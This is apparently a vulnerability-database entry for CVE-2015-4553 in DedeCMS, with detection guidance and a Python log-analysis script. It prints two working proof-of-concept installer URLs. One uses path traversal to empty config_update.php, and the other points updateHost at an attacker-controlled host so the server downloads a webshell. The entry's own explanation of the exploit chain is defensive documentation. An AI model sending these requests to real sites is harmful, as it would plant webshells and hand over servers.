CVE-2015-4553
Published 2020-01-06
CVE-2015-4553: A file upload issue exists in DeDeCMS before 5.7-sp1 that allows a malicious user to obtain a webshell ("getshell").
Priority: P2 · 74 · high · CVSS 3.1 base score 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Exploit: available (see the PoC request URLs under Detection & IOCs)
EPSS: 56.74% (98.9th percentile)
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dedecms | dedecms | <= 5.6 | 5.7-sp1 (per the description) |
| dedecms | dedecms | — | — |
Note: the <= 5.6 range comes from the CPE data; the description says every release before 5.7-sp1 is affected, so unpatched 5.7 builds should also be treated as vulnerable.
Detection & IOCs (extracted from sources)

PoC request URLs (lab target 192.168.204.135; attacker-controlled fetch host 119.253.3.18:8000):
- http://192.168.204.135/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php
- http://192.168.204.135/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=hello.php&updateHost=http://119.253.3.18:8000/

Detection opportunities:
- Detect HTTP requests to /install/index.php.bak with the query parameter step=11; this is the vulnerable code path used to overwrite config_update.php and write arbitrary webshells.
- Alert on requests to /install/index.php.bak whose install_demo_name parameter contains path traversal sequences (e.g. ../) or targets config_update.php. Step 1 of the exploit empties that file to enable the variable overwrite.
- Alert on requests to /install/index.php.bak carrying an updateHost parameter that points to an external, attacker-controlled host. Step 2 makes the server fetch the webshell from that host and write it to disk.
- Monitor for creation of new PHP files (e.g. hello.php) inside the /install/ directory, the webshell drop location used in this exploit.
- Monitor for data/admin/config_update.php being truncated to 0 bytes, the prerequisite for step 2 of the exploit.
- Detect outbound HTTP GET requests from the web-server process whose path matches /dedecms/demodata.<lang>.txt; this indicates the server is fetching attacker-controlled webshell content.

Notes:
- The exploit relies on PHP variable overwrite (often rendered from Chinese as "variable coverage") via unvalidated GET parameters in index.php.bak. The vulnerable file is a backup (.bak) of the installer that should not be reachable after installation.
- Step 1 requires the install directory to still be present and accessible; the attack is only possible if the installer was not removed after deployment.
- $updateHost in config_update.php is the critical control point: once config_update.php has been zeroed out, nothing defines it, so the attacker can supply an arbitrary updateHost as a GET parameter and redirect the file fetch to a server they control.
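The detection opportunities and notes above translate directly into log-side rules. The following is an added example (not code from this page or from the DedeCMS project) that runs those rules over constructed access-log lines: it flags step=11 hits on the installer, traversal or config_update.php in install_demo_name, any .php drop name, and a client-supplied updateHost that is not on an operator allowlist. The combined log format, the TRUSTED_UPDATE_HOSTS allowlist and the sample lines are assumptions; the two installer requests in the sample reproduce the PoC URLs listed above.

```python
"""Added example: detection logic for the CVE-2015-4553 request shapes
described above, run over constructed web-server access-log lines.
This is not code from the page or from the DedeCMS project."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx "combined"-style access log: src - - [time] "METHOD url PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)

# Installer entry points. The .bak copy is the one the PoC hits; the live
# installer exposes the same code path, so both are watched.
INSTALLER_PATHS = ("/install/index.php.bak", "/install/index.php")

# Assumption: the only host a legitimate installer should pull demo data from.
# Any other updateHost supplied by a client is treated as attacker-controlled.
TRUSTED_UPDATE_HOSTS = {"updatenew.dedecms.com"}


def analyze_request(url, status=None):
    """Return the sorted list of rule names one request URL matches ([] if none)."""
    parts = urlsplit(url)
    path = unquote(parts.path)
    if not any(path.endswith(p) for p in INSTALLER_PATHS):
        return []
    # parse_qs decodes once; the extra unquote catches double-encoded traversal.
    q = {k: unquote(v[0]) for k, v in
         parse_qs(parts.query, keep_blank_values=True).items()}
    hits = set()
    if status == "200":
        hits.add("installer_reachable")      # installer still present after deployment
    if q.get("step") == "11":
        hits.add("installer_step11")         # the remote-fetch-and-write branch
    demo = q.get("install_demo_name", "")
    if ".." in demo:
        hits.add("demo_name_traversal")      # step 1: escape install/ to reach data/admin
    if demo.endswith("config_update.php"):
        hits.add("config_update_target")     # step 1: truncate the file defining $updateHost
    if demo.lower().endswith(".php"):
        hits.add("php_drop")                 # step 2: webshell written under install/
    if "updateHost" in q:
        host = urlsplit(q["updateHost"]).hostname or ""
        if host not in TRUSTED_UPDATE_HOSTS:
            hits.add("updatehost_override")  # step 2: fetch source redirected to attacker
    return sorted(hits)


def analyze_log(lines):
    """Return one finding per suspicious request: {"src", "url", "hits"}."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = analyze_request(m["url"], m["status"])
        if hits:
            findings.append({"src": m["src"], "url": m["url"], "hits": hits})
    return findings


# Constructed sample log; the two installer requests reproduce the PoC URLs above.
SAMPLE_LOG = [
    '192.168.204.1 - - [06/Jan/2020:10:00:01 +0000] "GET /install/index.php.bak'
    '?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php'
    ' HTTP/1.1" 200 512',
    '192.168.204.1 - - [06/Jan/2020:10:00:05 +0000] "GET /install/index.php.bak'
    '?step=11&insLockfile=a&s_lang=a&install_demo_name=hello.php'
    '&updateHost=http://119.253.3.18:8000/ HTTP/1.1" 200 640',
    '203.0.113.7 - - [06/Jan/2020:10:01:00 +0000] "GET /plus/list.php?tid=1 HTTP/1.1" 200 2048',
    '203.0.113.7 - - [06/Jan/2020:10:02:00 +0000] "GET /install/index.php?step=1 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["src"], ", ".join(f["hits"]), f["url"])
```

The installer_reachable rule fires on any successful request to the installer, including the benign step=1 line, because the notes above make the installer's mere presence after deployment the precondition for the whole chain; tune it to the deployment window rather than suppressing it.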
CVSS provenance
- NVD, CVSS v3.1: 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
- NVD, CVSS v2.0: 6.5 MEDIUM (AV:N/AC:L/Au:S/C:P/I:P/A:P)
No detection rules found.
No writeups or analysis indexed.